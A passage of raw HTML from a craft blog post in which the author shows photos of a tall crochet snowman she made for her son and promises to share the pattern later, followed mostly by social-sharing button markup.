tall.</p><p>&nbsp;<br> &nbsp;</p></blockquote><p><img src=https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-4-wm.jpg alt="crochet snowman" width=630 height=420 class="aligncenter size-full wp-image-55159" srcset="https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-4-wm.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-4-wm-600x400.jpg 600w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/12/05/crochet-snowman/ data-jpibfi-post-title="Crochet Snowman" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-4-wm.jpg></p><blockquote><p>In case you wonder about the pattern&#8230; I do have it written down on paper, I just need to make slight changes, transfer it to my computer, take step-by-step pictures&#8230; and then I will surely share it with you. Once it&#8217;s all done I will let you know here on this blog.</p><p>&nbsp;<br> &nbsp;</p></blockquote><p><img src=https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-5-wm.jpg alt="crochet snowman" width=630 height=420 class="aligncenter size-full wp-image-55161" srcset="https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-5-wm.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-5-wm-600x400.jpg 600w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/12/05/crochet-snowman/ data-jpibfi-post-title="Crochet Snowman" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-5-wm.jpg></p><blockquote><p> And now I am rushing to make 2 more, one the same size, one even bigger. Our living room (which is more like a play room now) just needs them&#8230; I think 🙂</p><p>Thank you for letting me share!</p><p>I am wishing you a lot of peace and joy during this beautiful time of year.</p><p>With lots of love,</p><p>Petra ♡</p><p>&nbsp;</p></blockquote><div class="essb_links essb_counters essb_counter_modern_top essb_displayed_bottom essb_share essb_template_clear-retina essb_1753641447 essb_links_center print-no" id=essb_displayed_bottom_1753641447 data-essb-postid=55148 data-essb-position=bottom data-essb-button-style=icon data-essb-template=clear-retina data-essb-counter-pos=left data-essb-url=http://zoomyummy.com/2017/12/05/crochet-snowman/ data-essb-twitter-url=http://zoomyummy.com/2017/12/05/crochet-snowman/ data-essb-instance=1753641447><ul class="essb_links_list essb_force_hide_name essb_force_hide"><li class="essb_item essb_totalcount_item" style="display: none !important;" data-counter-pos=left><span class="essb_totalcount essb_t_l" title="Total: "><span class=essb_total_text>Total: </span><span class=essb_t_nb>176</span></span></li><li class="essb_item essb_link_print nolightbox"> <span class=essb_counter data-cnt=32 data-cnt-short=32>32</span><a href="http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;print_friendly&#39;,&#39;1753641447&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_print"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_facebook nolightbox"> <span class=essb_counter data-cnt=1 data-cnt-short=1>1</span><a href="https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/12/05/crochet-snowman/&t=Crochet+Snowman" title onclick="essb.window(&#39;https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/12/05/crochet-snowman/&t=Crochet+Snowman&#39;,&#39;facebook&#39;,&#39;1753641447&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_facebook"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_twitter nolightbox"> <span class=essb_counter data-cnt=43 data-cnt-short=43>43</span><a href=# title onclick="essb.window(&#39;https://twitter.com/intent/tweet?text=Crochet+Snowman&amp;url=http://zoomyummy.com/2017/12/05/crochet-snowman/&amp;counturl=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;twitter&#39;,&#39;1753641447&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_twitter"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_google nolightbox"> <span class=essb_counter data-cnt=16 data-cnt-short=16>16</span><a href="https://plus.google.com/share?url=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;https://plus.google.com/share?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;google&#39;,&#39;1753641447&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_google"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_pinterest nolightbox"> <span class=essb_counter data-cnt=19 data-cnt-short=19>19</span><a href=# title onclick="essb.pinterest_picker(&#39;1753641447&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_pinterest"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_stumbleupon nolightbox"> <span class=essb_counter data-cnt=22 data-cnt-short=22>22</span><a href="http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;stumbleupon&#39;,&#39;1753641447&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_stumbleupon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_mail nolightbox"> <span class=essb_counter data-cnt=43 data-cnt-short=43>43</span><a href=# title onclick="essb_open_mailform(&#39;1753641447&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mail"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_more nolightbox"> <a href=# title onclick="essb.toggle_more_popup(&#39;1753641447&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_more"></span><span class="essb_network_name essb_noname"></span></a></li></ul></div><div class="essb_morepopup essb_morepopup_1753641447 essb_morepopup_bottom" style=display:none;> <a href=# class=essb_morepopup_close onclick="essb.toggle_less_popup('1753641447'); return false;"><i class=essb_icon_close></i></a><div class="essb_morepopup_content essb_morepopup_content_1753641447"><div class="essb_links essb_displayed_more_popup essb_share essb_template_clear-retina essb_2143012894 essb_width_columns_3 essb_links_center print-no" id=essb_displayed_more_popup_2143012894 data-essb-postid=55148 data-essb-position=more_popup data-essb-button-style=button data-essb-template=clear-retina data-essb-counter-pos=left data-essb-url=http://zoomyummy.com/2017/12/05/crochet-snowman/ data-essb-twitter-url=http://zoomyummy.com/2017/12/05/crochet-snowman/ data-essb-instance=2143012894><ul class=essb_links_list><li class="essb_item essb_link_facebook nolightbox"> <a href="https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/12/05/crochet-snowman/&t=Crochet+Snowman" title onclick="essb.window(&#39;https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/12/05/crochet-snowman/&t=Crochet+Snowman&#39;,&#39;facebook&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_facebook"></span><span class=essb_network_name>Facebook</span></a></li><li class="essb_item essb_link_twitter nolightbox"> <a href=# title onclick="essb.window(&#39;https://twitter.com/intent/tweet?text=Crochet+Snowman&amp;url=http://zoomyummy.com/2017/12/05/crochet-snowman/&amp;counturl=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;twitter&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_twitter"></span><span class=essb_network_name>Twitter</span></a></li><li class="essb_item essb_link_google nolightbox"> <a href="https://plus.google.com/share?url=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;https://plus.google.com/share?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;google&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_google"></span><span class=essb_network_name>Google+</span></a></li><li class="essb_item essb_link_pinterest nolightbox"> <a href=# title onclick="essb.pinterest_picker(&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_pinterest"></span><span class=essb_network_name>Pinterest</span></a></li><li class="essb_item essb_link_linkedin nolightbox"> <a href="https://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=Crochet+Snowman&amp;url=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;https://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=Crochet+Snowman&amp;url=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;linkedin&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_linkedin"></span><span class=essb_network_name>LinkedIn</span></a></li><li class="essb_item essb_link_digg nolightbox"> <a href="http://digg.com/submit?phase=2amp;url=http://zoomyummy.com/2017/12/05/crochet-snowman/&amp;title=Crochet+Snowman" title onclick="essb.window(&#39;http://digg.com/submit?phase=2amp;url=http://zoomyummy.com/2017/12/05/crochet-snowman/&amp;title=Crochet+Snowman&#39;,&#39;digg&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_digg"></span><span class=essb_network_name>Digg</span></a></li><li class="essb_item essb_link_del nolightbox"> <a href="https://del.icio.us/login?log=out&provider=essb&title=Crochet+Snowman&url=http://zoomyummy.com/2017/12/05/crochet-snowman/&v=5" title onclick="essb.window(&#39;https://del.icio.us/login?log=out&provider=essb&title=Crochet+Snowman&url=http://zoomyummy.com/2017/12/05/crochet-snowman/&v=5&#39;,&#39;del&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_del"></span><span class=essb_network_name>Del</span></a></li><li class="essb_item essb_link_stumbleupon nolightbox"> <a href="http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;stumbleupon&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_stumbleupon"></span><span class=essb_network_name>StumbleUpon</span></a></li><li class="essb_item essb_link_tumblr nolightbox"> <a href="http://tumblr.com/share?s=&v=3&t=Crochet+Snowman&u=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F" title onclick="essb.window(&#39;http://tumblr.com/share?s=&v=3&t=Crochet+Snowman&u=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F&#39;,&#39;tumblr&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_tumblr"></span><span class=essb_network_name>Tumblr</span></a></li><li class="essb_item essb_link_vk nolightbox"> <a href="http://vkontakte.ru/share.php?url=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;http://vkontakte.ru/share.php?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;vk&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_vk"></span><span class=essb_network_name>VKontakte</span></a></li><li class="essb_item essb_link_print nolightbox"> <a href="http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;print_friendly&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_print"></span><span class=essb_network_name>Print</span></a></li><li class="essb_item essb_link_mail nolightbox"> <a href=# title onclick="essb_open_mailform(&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mail"></span><span class=essb_network_name>Email</span></a></li><li class="essb_item essb_link_flattr nolightbox"> <a href="https://flattr.com/submit/auto?user_id=&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F&title=Crochet%2BSnowman&description=+Hello+dear+friends%21+I+hope+that+you+are+all+doing+fine.+I+am+confirming+that+I+am+still+here%2C+and+crocheting...+Always%21+Actually%2C+I+would+like+to+show+you+my+latest+creation%2C+a+crochet+snowman.+Ta-dah%21+I%27ve+had+this+snowman+kind+of+idea+in+my+mind+for+quite+some+time%2C+I+think+I%27d+even+mentioned+it+in+one+of+my+posts+here+on+this+blog+a+couple+of+years+ago%2C+posting+a+picture+of+a+snowman+just+being+made...+Well%2C+that+one+never+got+finished%2C+just+until+now.+Having+a+little+boy+now%2C+I+thought+it+could+be+sweet+to+make+something+unique+for+him+this+winter.+So%2C+a+snowman+was+born.+And+my+baby+%28well%2C+almost+3+years+old+baby%29+likes+his+new+toy+friend+very+very+much+-+he+just+grabs+him+by+the+hat+and+off+they+go+together...+%3A%29+%26nbsp%3B+%26nbsp%3B+My+plan+was+to+make+it+rather+tall.+Using+an+Aran+weight+yarn+%28Red+Heart+Soft%29+and+a+4.5+mm+hook+it+turned+out+to+be+almost+18+inches+%2845+cm%29+tall.+%26nbsp%3B+%26nbsp%3B+In+case+you+wonder+about+the+pattern...+I+do+ha&language=sq_AL&tags=Christmas%2Ccrochet%2Csnowman%2Cwinter&hidden=0&category=text" title onclick="essb.window(&#39;https://flattr.com/submit/auto?user_id=&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F&title=Crochet%2BSnowman&description=+Hello+dear+friends%21+I+hope+that+you+are+all+doing+fine.+I+am+confirming+that+I+am+still+here%2C+and+crocheting...+Always%21+Actually%2C+I+would+like+to+show+you+my+latest+creation%2C+a+crochet+snowman.+Ta-dah%21+I%27ve+had+this+snowman+kind+of+idea+in+my+mind+for+quite+some+time%2C+I+think+I%27d+even+mentioned+it+in+one+of+my+posts+here+on+this+blog+a+couple+of+years+ago%2C+posting+a+picture+of+a+snowman+just+being+made...+Well%2C+that+one+never+got+finished%2C+just+until+now.+Having+a+little+boy+now%2C+I+thought+it+could+be+sweet+to+make+something+unique+for+him+this+winter.+So%2C+a+snowman+was+born.+And+my+baby+%28well%2C+almost+3+years+old+baby%29+likes+his+new+toy+friend+very+very+much+-+he+just+grabs+him+by+the+hat+and+off+they+go+together...+%3A%29+%26nbsp%3B+%26nbsp%3B+My+plan+was+to+make+it+rather+tall.+Using+an+Aran+weight+yarn+%28Red+Heart+Soft%29+and+a+4.5+mm+hook+it+turned+out+to+be+almost+18+inches+%2845+cm%29+tall.+%26nbsp%3B+%26nbsp%3B+In+case+you+wonder+about+the+pattern...+I+do+ha&language=sq_AL&tags=Christmas%2Ccrochet%2Csnowman%2Cwinter&hidden=0&category=text&#39;,&#39;flattr&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_flattr"></span><span class=essb_network_name>Flattr</span></a></li><li class="essb_item essb_link_reddit nolightbox"> <a href="http://reddit.com/submit?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&amp;title=Crochet+Snowman" title onclick="essb.window(&#39;http://reddit.com/submit?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&amp;title=Crochet+Snowman&#39;,&#39;reddit&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_reddit"></span><span class=essb_network_name>Reddit</span></a></li><li class="essb_item essb_link_buffer nolightbox"> <a href="https://bufferapp.com/add?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&text=Crochet+Snowman&via=&picture=&count=horizontal&source=button" title onclick="essb.window(&#39;https://bufferapp.com/add?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&text=Crochet+Snowman&via=&picture=&count=horizontal&source=button&#39;,&#39;buffer&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_buffer"></span><span class=essb_network_name>Buffer</span></a></li><li class="essb_item essb_link_love nolightbox"> <a href=# title onclick="essb.loveThis(&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_love"></span><span class=essb_network_name>Love This</span></a></li><li class="essb_item essb_link_weibo nolightbox"> <a href="http://service.weibo.com/share/share.php?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&title=Crochet+Snowman&pic=" title onclick="essb.window(&#39;http://service.weibo.com/share/share.php?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&title=Crochet+Snowman&pic=&#39;,&#39;weibo&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_weibo"></span><span class=essb_network_name>Weibo</span></a></li><li class="essb_item essb_link_pocket nolightbox"> <a href="https://getpocket.com/save?title=Crochet+Snowman&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F" title onclick="essb.window(&#39;https://getpocket.com/save?title=Crochet+Snowman&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F&#39;,&#39;pocket&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_pocket"></span><span class=essb_network_name>Pocket</span></a></li><li class="essb_item essb_link_xing nolightbox"> <a href="https://www.xing.com/social_plugins/share?h=1;url=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;https://www.xing.com/social_plugins/share?h=1;url=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;xing&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_xing"></span><span class=essb_network_name>Xing</span></a></li><li class="essb_item essb_link_ok nolightbox"> <a href="http://www.odnoklassniki.ru/dk?st.cmd=addShare&st.s=1&st._surl=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;http://www.odnoklassniki.ru/dk?st.cmd=addShare&st.s=1&st._surl=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;ok&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_ok"></span><span class=essb_network_name>Odnoklassniki</span></a></li><li class="essb_item essb_link_mwp nolightbox"> <a href="http://managewp.org/share/form?url=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F" title onclick="essb.window(&#39;http://managewp.org/share/form?url=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F&#39;,&#39;mwp&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mwp"></span><span class=essb_network_name>ManageWP.org</span></a></li><li class="essb_item essb_link_whatsapp nolightbox"> <a href="whatsapp://send?text=Crochet%20Snowman%20http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F" title onclick="essb.tracking_only('', 'whatsapp', '2143012894', true);" target=_self rel=nofollow ><span class="essb_icon essb_icon_whatsapp"></span><span class=essb_network_name>WhatsApp</span></a></li><li class="essb_item essb_link_meneame nolightbox"> <a href="http://www.meneame.net/submit.php?url=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;http://www.meneame.net/submit.php?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;meneame&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_meneame"></span><span class=essb_network_name>Meneame</span></a></li><li class="essb_item essb_link_blogger nolightbox"> <a href="https://www.blogger.com/blog_this.pyra?t&u=http://zoomyummy.com/2017/12/05/crochet-snowman/&n=Crochet+Snowman" title onclick="essb.window(&#39;https://www.blogger.com/blog_this.pyra?t&u=http://zoomyummy.com/2017/12/05/crochet-snowman/&n=Crochet+Snowman&#39;,&#39;blogger&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_blogger"></span><span class=essb_network_name>Blogger</span></a></li><li class="essb_item essb_link_amazon nolightbox"> <a href="http://www.amazon.com/gp/wishlist/static-add?u=http://zoomyummy.com/2017/12/05/crochet-snowman/&t=Crochet+Snowman" title onclick="essb.window(&#39;http://www.amazon.com/gp/wishlist/static-add?u=http://zoomyummy.com/2017/12/05/crochet-snowman/&t=Crochet+Snowman&#39;,&#39;amazon&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_amazon"></span><span class=essb_network_name>Amazon</span></a></li><li class="essb_item essb_link_yahoomail nolightbox"> <a href="http://compose.mail.yahoo.com/?body=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;http://compose.mail.yahoo.com/?body=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;yahoomail&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_yahoomail"></span><span class=essb_network_name>Yahoo Mail</span></a></li><li class="essb_item essb_link_gmail nolightbox"> <a href="https://mail.google.com/mail/u/0/?view=cm&fs=1&su=Crochet+Snowman&body=http://zoomyummy.com/2017/12/05/crochet-snowman/&ui=2&tf=1" title onclick="essb.window(&#39;https://mail.google.com/mail/u/0/?view=cm&fs=1&su=Crochet+Snowman&body=http://zoomyummy.com/2017/12/05/crochet-snowman/&ui=2&tf=1&#39;,&#39;gmail&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_gmail"></span><span class=essb_network_name>Gmail</span></a></li><li class="essb_item essb_link_aol nolightbox"> <a href="http://webmail.aol.com/Mail/ComposeMessage.aspx?subject=Crochet+Snowman&body=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;http://webmail.aol.com/Mail/ComposeMessage.aspx?subject=Crochet+Snowman&body=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;aol&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_aol"></span><span class=essb_network_name>AOL</span></a></li><li class="essb_item essb_link_newsvine nolightbox"> <a href="http://www.newsvine.com/_tools/seed&save?u=http://zoomyummy.com/2017/12/05/crochet-snowman/&h=Crochet+Snowman" title onclick="essb.window(&#39;http://www.newsvine.com/_tools/seed&save?u=http://zoomyummy.com/2017/12/05/crochet-snowman/&h=Crochet+Snowman&#39;,&#39;newsvine&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_newsvine"></span><span class=essb_network_name>Newsvine</span></a></li><li class="essb_item essb_link_hackernews nolightbox"> <a href="https://news.ycombinator.com/submitlink?u=http://zoomyummy.com/2017/12/05/crochet-snowman/&t=Crochet+Snowman" title onclick="essb.window(&#39;https://news.ycombinator.com/submitlink?u=http://zoomyummy.com/2017/12/05/crochet-snowman/&t=Crochet+Snowman&#39;,&#39;hackernews&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_hackernews"></span><span class=essb_network_name>HackerNews</span></a></li><li class="essb_item essb_link_evernote nolightbox"> <a href="http://www.evernote.com/clip.action?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&title=Crochet+Snowman" title onclick="essb.window(&#39;http://www.evernote.com/clip.action?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&title=Crochet+Snowman&#39;,&#39;evernote&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_evernote"></span><span class=essb_network_name>Evernote</span></a></li><li class="essb_item essb_link_myspace nolightbox"> <a href="https://myspace.com/post?u=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;https://myspace.com/post?u=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;myspace&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_myspace"></span><span class=essb_network_name>MySpace</span></a></li><li class="essb_item essb_link_mailru nolightbox"> <a href="http://connect.mail.ru/share?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&title=Crochet+Snowman&description=" title onclick="essb.window(&#39;http://connect.mail.ru/share?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&title=Crochet+Snowman&description=&#39;,&#39;mailru&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mailru"></span><span class=essb_network_name>Mail.ru</span></a></li><li class="essb_item essb_link_viadeo nolightbox"> <a href="https://www.viadeo.com/?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&amp;title=Crochet+Snowman" title onclick="essb.window(&#39;https://www.viadeo.com/?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&amp;title=Crochet+Snowman&#39;,&#39;viadeo&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_viadeo"></span><span class=essb_network_name>Viadeo</span></a></li><li class="essb_item essb_link_line nolightbox"> <a href="https://social-plugins.line.me/lineit/share?url=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F" title onclick="essb.tracking_only('', 'line', '2143012894', true);" target=_self rel=nofollow ><span class="essb_icon essb_icon_line"></span><span class=essb_network_name>Line</span></a></li><li class="essb_item essb_link_flipboard nolightbox"> <a href="https://share.flipboard.com/bookmarklet/popout?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&title=Crochet+Snowman" title onclick="essb.window(&#39;https://share.flipboard.com/bookmarklet/popout?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&title=Crochet+Snowman&#39;,&#39;flipboard&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_flipboard"></span><span class=essb_network_name>Flipboard</span></a></li><li class="essb_item essb_link_comments nolightbox"> <a href=#comments title onclick="essb.tracking_only('', 'comments', '2143012894', true);" target=_self rel=nofollow ><span class="essb_icon essb_icon_comments"></span><span class=essb_network_name>Comments</span></a></li><li class="essb_item essb_link_yummly nolightbox"> <a href="http://www.yummly.com/urb/verify?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&title=Crochet+Snowman&image=&yumtype=button" title onclick="essb.window(&#39;http://www.yummly.com/urb/verify?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&title=Crochet+Snowman&image=&yumtype=button&#39;,&#39;yummly&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_yummly"></span><span class=essb_network_name>Yummly</span></a></li><li class="essb_item essb_link_sms nolightbox"> <a href="sms:&body=Crochet%20Snowman%20http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F" title onclick="essb.window(&#39;sms:&body=Crochet%20Snowman%20http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F&#39;,&#39;sms&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_sms"></span><span class=essb_network_name>SMS</span></a></li><li class="essb_item essb_link_viber nolightbox"> <a href="viber://forward?text=Crochet%20Snowman%20http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F" title onclick="essb.tracking_only('', 'viber', '2143012894', true);" target=_blank rel=nofollow ><span class="essb_icon essb_icon_viber"></span><span class=essb_network_name>Viber</span></a></li><li class="essb_item essb_link_telegram nolightbox"> <a href="tg://msg?text=Crochet%20Snowman%20http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F" title onclick="essb.tracking_only('', 'telegram', '2143012894', true);" target=_blank rel=nofollow ><span class="essb_icon essb_icon_telegram"></span><span class=essb_network_name>Telegram</span></a></li><li class="essb_item essb_link_subscribe nolightbox"> <a href=# title onclick="essb.toggle_subscribe('2143012894'); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_subscribe"></span><span class=essb_network_name>Subscribe</span></a></li><li class="essb_item essb_link_skype nolightbox"> <a href="https://web.skype.com/share?url=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;https://web.skype.com/share?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;skype&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_skype"></span><span class=essb_network_name>Skype</span></a></li><li class="essb_item essb_link_messenger nolightbox"> <a href="https://www.facebook.com/dialog/send?app_id=&link=http://zoomyummy.com/2017/12/05/crochet-snowman/&redirect_uri=https://facebook.com" title onclick="essb.window(&#39;https://www.facebook.com/dialog/send?app_id=&link=http://zoomyummy.com/2017/12/05/crochet-snowman/&redirect_uri=https://facebook.com&#39;,&#39;messenger&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_messenger"></span><span class=essb_network_name>Facebook Messenger</span></a></li><li class="essb_item essb_link_kakaotalk nolightbox"> <a href="https://story.kakao.com/share?url=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;https://story.kakao.com/share?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;kakaotalk&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_kakaotalk"></span><span class=essb_network_name>Kakao</span></a></li><li class="essb_item essb_link_livejournal nolightbox"> <a href="http://www.livejournal.com/update.bml?subject=Crochet Snowman&event=%3Ca+href%3D%22http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F%22%3ECrochet+Snowman%3C%2Fa%3E" title onclick="essb.window(&#39;http://www.livejournal.com/update.bml?subject=Crochet 